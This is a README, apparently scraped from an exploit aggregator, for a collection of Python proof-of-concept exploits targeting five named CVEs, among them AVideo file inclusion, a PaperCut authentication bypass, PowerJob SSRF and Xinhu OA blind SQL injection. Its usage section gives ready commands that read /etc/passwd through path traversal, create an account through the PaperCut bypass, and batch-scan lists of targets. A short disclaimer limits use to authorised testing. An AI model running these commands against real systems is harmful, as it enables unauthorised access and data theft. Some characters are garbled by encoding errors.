Share
## https://sploitus.com/exploit?id=87000A19-0CBA-58F1-8B7B-297371A22DF1
# Goby POC Collection
> Convert Goby vulnerability scan toolsβ POC/EXPs into Python-based implementations.
> Python implementations of Goby vulnerability POCs
## π Vulnerability List
| # | Vulnerability Name | Type | CVE | Has EXP? |
|---|-------------------|------|-----|-------|
| 1 | [AVideo File Inclusion Vulnerability](./exploits/avideo_file_inclusion.py) | File Inclusion | CVE-2026-33513 | β
|
| 2 | [PaperCut NG/MF Permission Bypass Vulnerability](./exploits/papercut_auth_bypass.py) | Permission Bypass | CVE-2023-27351 | β
|
| 3 | [PowerJob SSRF Vulnerability](./exploits/powerjob_ssrf.py) | SSRF | CVE-2025-14518 | β
|
| 4 | [WordPress User Enumeration Permission Bypass](./exploits/wordpress_permission_bypass.py) | Permission Bypass | CVE-2025-4302 | β
|
| 5 | [Xinhu OA SQL Injection Blind Attack](./exploits/xinhu_oa_sqli_blind.py) | SQL Injection | CVE-2025-63742 | β |
## π Quick Usage
```bash
# Install dependencies
pip install -r requirements.txt
# Use a unified entry point
python run_poc.py check http://target.com:8080 --poc avideo_file_inclusion
python run_poc.py exploit http://target.com:8080 --poc avideo_file_inclusion --params '{"filePath":"../etc/passwd"}'
# Run individual POCs
python exploits/avideo_file_inclusion.py check http://target.com:8080
python exploits/papercut_auth_bypass.py exploit http://target.com:8080 --params '{"username":"admin","passwd":"Admin@123"}'
# Batch detection
python run_poc.py batch targets.txt --poc all
```
## π Directory Structure
```
goby-pocs/
βββ README.md # This file
βββ requirements.txt # Python dependencies
βββ run_poc.py # Unified entry point script
βββ goby_poc.py # POC base framework
βββ exploits/
β βββ avideo_file_inclusion.py # AVideo File Inclusion (CVE-2026-33513)
β βββ papercut_auth_bypass.py # PaperCut Authentication Bypass (CVE-2023-27351)
β βββ powerjob_ssrf.py # PowerJob SSRF (CVE-2025-14518)
β βββ wordpress_permission_bypass.py # WordPress Permission Bypass (CVE-2025-4302)
β βββ xinhu_oa_sqli_blind.py # Xinhu OA SQL Blind Attack (CVE-2025-63742)
```
## π Information Contained in Each POC
Each POC file is a **standalone, executable** Python script that includes:
1. **Vulnerability documentation** β Product name, vulnerability type, entry point, vulnerability mechanism, severity
2. **Detection logic** β `check()` method, returns whether a vulnerability exists
3. **Exploitation logic** β `exploit()` method (if available), executes the vulnerability
4. **Command-line entry point** β Can be run directly
## βοΈ How to Use
### Detect a Single Target
```bash
# Format: python exploits/.py check
python exploits/powerjob_ssrf.py check http://192.168.1.100:7700
```
### Exploit a Vulnerability
```bash
# Format: python exploits/.py exploit [--params JSON]
python exploits/avideo_file_inclusion.py exploit http://192.168.1.100:8080 --params '{"filePath":"../etc/passwd"}'
python exploits/papercut_auth_bypass.py exploit http://192.168.1.100:9191 --params '{"username":"hacker","passwd":"Hacker@123"}'
```
### Batch Detection
```bash
# targets.txt: One target per line
python run_poc.py batch targets.txt --poc powerjob_ssrf
```
## π Disclaimer
This tool is for security research and authorized testing purposes only. Users must comply with relevant laws and regulations. Please do not use it for illegal purposes.